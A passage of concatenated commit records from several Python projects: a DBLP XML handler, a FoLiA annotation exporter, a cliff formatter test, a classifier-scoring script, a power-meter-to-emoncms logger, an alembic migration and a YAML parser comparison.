if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
<commit_before><commit_msg>Split loader and xml handler<commit_after>
|
class DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super().__init__()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
Split loader and xml handlerclass DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super().__init__()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
<commit_before><commit_msg>Split loader and xml handler<commit_after>class DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super().__init__()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
|
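As committed, this handler file references names it never imports — ContentHandler, logging, pubtypes, loadAuthorFilter, compareNames, removeAccents — so they presumably still live in the loader module it was split out of. A minimal import block that would make the file stand alone; the helper module path is a guess, not something stated in the commit:
# Hypothetical imports for dblpcontent.py (module paths are assumptions)
import logging
from xml.sax.handler import ContentHandler  # standard-library SAX base class
# The project-specific helpers are assumed to sit in the loader package;
# 'dblploader.loader' is illustrative only:
# from dblploader.loader import (pubtypes, loadAuthorFilter,
#                                compareNames, removeAccents)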
e04609d6ac992c6ff06b7e907901dbfa3bfa4e38
|
folia2visualizaton.py
|
folia2visualizaton.py
|
"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
Add script to generate input data for the visualization assignment
|
Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words>
|
Python
|
apache-2.0
|
NLeSC/embodied-emotions-scripts,NLeSC/embodied-emotions-scripts
|
Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words>
|
"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
<commit_before><commit_msg>Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words><commit_after>
|
"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words>"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
<commit_before><commit_msg>Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words><commit_after>"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
|
e447666860730039eb1a3fa040f79d6b8a852fd5
|
cliff/tests/test_formatters_shell.py
|
cliff/tests/test_formatters_shell.py
|
#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
Add unit test for shell formatter
|
Add unit test for shell formatter
This is in preparation for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908
|
Python
|
apache-2.0
|
citrix-openstack-build/cliff,citrix-openstack-build/cliff,idjaw/cliff,idjaw/cliff,openstack/cliff,openstack/cliff,dtroyer/cliff,enzochiau/cliff,varunarya10/cliff,varunarya10/cliff,enzochiau/cliff,dtroyer/cliff
|
Add unit test for shell formatter
This is in preparation for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908
|
#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
<commit_before><commit_msg>Add unit test for shell formatter
This is in preparation for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908<commit_after>
|
#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
Add unit test for shell formatter
This is in preparation for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
<commit_before><commit_msg>Add unit test for shell formatter
This is in preparation for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908<commit_after>#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
|
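The message above says this test exists in preparation for escaping double quotes in shell output. A hypothetical follow-up test for that behaviour might look like the sketch below; the escaping convention (backslash-escaped quotes) is an assumption, not something this commit defines:
# Hypothetical follow-up test once ShellFormatter escapes double quotes
def test_shell_formatter_with_embedded_quotes():
    sf = shell.ShellFormatter()
    c = ('a',)
    d = ('A "quoted" value',)
    expected = 'a="A \\"quoted\\" value"\n'  # assumed escaping convention
    output = StringIO()
    args = mock.Mock()
    args.variables = ['a']
    args.prefix = ''
    sf.emit_one(c, d, output, args)
    assert expected == output.getvalue()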
1d2d865cd2843924993003b579f336c48bbef127
|
score_classifiers.py
|
score_classifiers.py
|
from sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
Add script to score different classifiers
|
Add script to score different classifiers
|
Python
|
mit
|
ssaamm/sign-language-translator,ssaamm/sign-language-tutor,ssaamm/sign-language-translator,ssaamm/sign-language-tutor
|
Add script to score different classifiers
|
from sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
<commit_before><commit_msg>Add script to score different classifiers<commit_after>
|
from sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
Add script to score different classifiersfrom sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
<commit_before><commit_msg>Add script to score different classifiers<commit_after>from sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
|
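The 80/20 split above is positional: it assigns the first rows of asl.data to training and the rest to test, which only gives a fair comparison if the samples are already shuffled. A randomized split with scikit-learn's helper would look like this sketch (model_selection on modern releases; the same-era module was sklearn.cross_validation):
# Sketch: randomized 80/20 split instead of a positional one
from sklearn.model_selection import train_test_split
import asl
training_data, test_data, training_target, test_target = train_test_split(
    asl.data, asl.target, test_size=0.2, random_state=0)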
be6194a27e3410c2393e6c4b70fb6e16d0a078b8
|
maplin2emoncms.py
|
maplin2emoncms.py
|
import serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
Add support for pushing data to emoncms
|
Add support for pushing data to emoncms
|
Python
|
mit
|
jpsingleton/Raspberry-Pi-Electricity-Monitor,jpsingleton/Raspberry-Pi-Electricity-Monitor
|
Add support for pushing data to emoncms
|
import serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
<commit_before><commit_msg>Add support for pushing data to emoncms<commit_after>
|
import serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
Add support for pushing data to emoncmsimport serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
<commit_before><commit_msg>Add support for pushing data to emoncms<commit_after>import serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
|
99d790a76e83185cc9c1dc000b3161e346fbebc1
|
alembic/versions/59ee93c4bf71_add_the_oneshot_column.py
|
alembic/versions/59ee93c4bf71_add_the_oneshot_column.py
|
"""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
Add forgotten alembic upgrade script.
|
Add forgotten alembic upgrade script.
|
Python
|
lgpl-2.1
|
jeremycline/fmn,jeremycline/fmn,jeremycline/fmn
|
Add forgotten alembic upgrade script.
|
"""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
<commit_before><commit_msg>Add forgotten alembic upgrade script.<commit_after>
|
"""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
Add forgotten alembic upgrade script."""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
<commit_before><commit_msg>Add forgotten alembic upgrade script.<commit_after>"""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
|
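Note that default=False in the migration above is a client-side SQLAlchemy default: it is applied by the ORM on insert, not written into the column definition, and existing rows are left as NULL in the new nullable column. If a database-level default were wanted instead, the column would use server_default — a sketch of that variant, not what the original migration does:
# Sketch: database-level default via server_default (assumption, not the
# behaviour of the committed migration)
op.add_column('filters',
              sa.Column('oneshot', sa.Boolean(), nullable=True,
                        server_default=sa.false()))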
fbb79398a9a6ddf5ffd850b2594b44066329bd98
|
python/yaml_tester.py
|
python/yaml_tester.py
|
import sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
Add script to validate files are yamelot compatible
|
Add script to validate files are yamelot compatible
|
Python
|
mit
|
gnprice/yamelot,gnprice/yamelot,gnprice/yamelot,gnprice/yamelot,gnprice/yamelot,gnprice/yamelot
|
Add script to validate files are yamelot compatible
|
import sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
